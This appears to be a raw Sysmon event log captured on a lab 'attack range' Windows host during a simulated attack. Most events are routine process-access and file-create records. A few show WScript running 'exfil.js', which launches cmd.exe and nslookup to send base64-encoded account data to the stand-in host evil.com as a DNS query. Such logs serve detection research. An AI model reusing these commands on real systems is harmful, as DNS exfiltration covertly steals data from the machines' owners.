14:16:21.512{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlofiiqo.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000197624Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.491{2E1864BB-FA4D-6299-5F07-000000005F02}6532ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\or89gb4t.default-release\datareporting\glean\db\data.safe.binMD5=13D4A43F6CEBFFB76CCCA0EF0DFC62F7,SHA256=8FFE5D3D5FA65E7C426715431FD77CF931DA87E40196A214568646DB9FD636C8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197623Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.459{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197622Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.459{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197621Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.459{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197620Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.459{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197619Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.459{2E1864BB-17B5-629A-4A3F-000000005F02}43647256C:\Windows\system32\conhost.exe{2E1864BB-17B5-629A-4C3F-000000005F02}4004C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000197618Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.459{2E1864BB-FA4D-6299-5F07-000000005F02}6532ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\or89gb4t.default-release\datareporting\glean\db\data.safe.binMD5=E8E66142A60A2A2D1AA69937AEAF046D,SHA256=4EFCFDEF4168583037C45EF0803F93D0116F1B95C84AF5D8F362859655D1C14F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000197617Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.428{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89BFCB06F0972292D65C396B546E2D2B,SHA256=95942FF76A5912E3D1790FBC101A6320099D1DC31CDBC3366C3577A0577AC3B1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197616Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.428{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B5-629A-4C3F-000000005F02}4004C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197615Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.428{2E1864BB-17B5-629A-493F-000000005F02}35687156C:\Windows\system32\cmd.exe{2E1864BB-17B5-629A-4C3F-000000005F02}4004C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197614Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.441{2E1864BB-17B5-629A-4C3F-000000005F02}4004C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B5-629A-493F-000000005F02}3568C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlofiiqo.tmp 2>&1 10341000x8000000000000000197613Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.391{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B5-629A-4A3F-000000005F02}4364C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197612Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.391{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B5-629A-4A3F-000000005F02}4364C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197611Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.391{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-17B5-629A-4B3F-000000005F02}4808C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197610Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.391{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197609Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.391{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197608Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.391{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197607Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.391{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197606Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.391{2E1864BB-E13C-6299-0500-000000005F02}416536C:\Windows\system32\csrss.exe{2E1864BB-17B5-629A-4B3F-000000005F02}4808C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197605Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.391{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-17B5-629A-4B3F-000000005F02}4808C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197604Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.392{2E1864BB-17B5-629A-4B3F-000000005F02}4808C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000197603Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.391{2E1864BB-17B5-629A-4A3F-000000005F02}43647256C:\Windows\system32\conhost.exe{2E1864BB-17B5-629A-493F-000000005F02}3568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197602Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.359{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B5-629A-4A3F-000000005F02}4364C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197601Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.343{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197600Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.343{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197599Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.343{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197598Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.343{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197597Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.343{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B5-629A-493F-000000005F02}3568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197596Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.343{2E1864BB-17A1-629A-783D-000000005F02}55526020C:\Windows\System32\WScript.exe{2E1864BB-17B5-629A-493F-000000005F02}3568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197595Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.356{2E1864BB-17B5-629A-493F-000000005F02}3568C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlofiiqo.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 10341000x8000000000000000197594Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 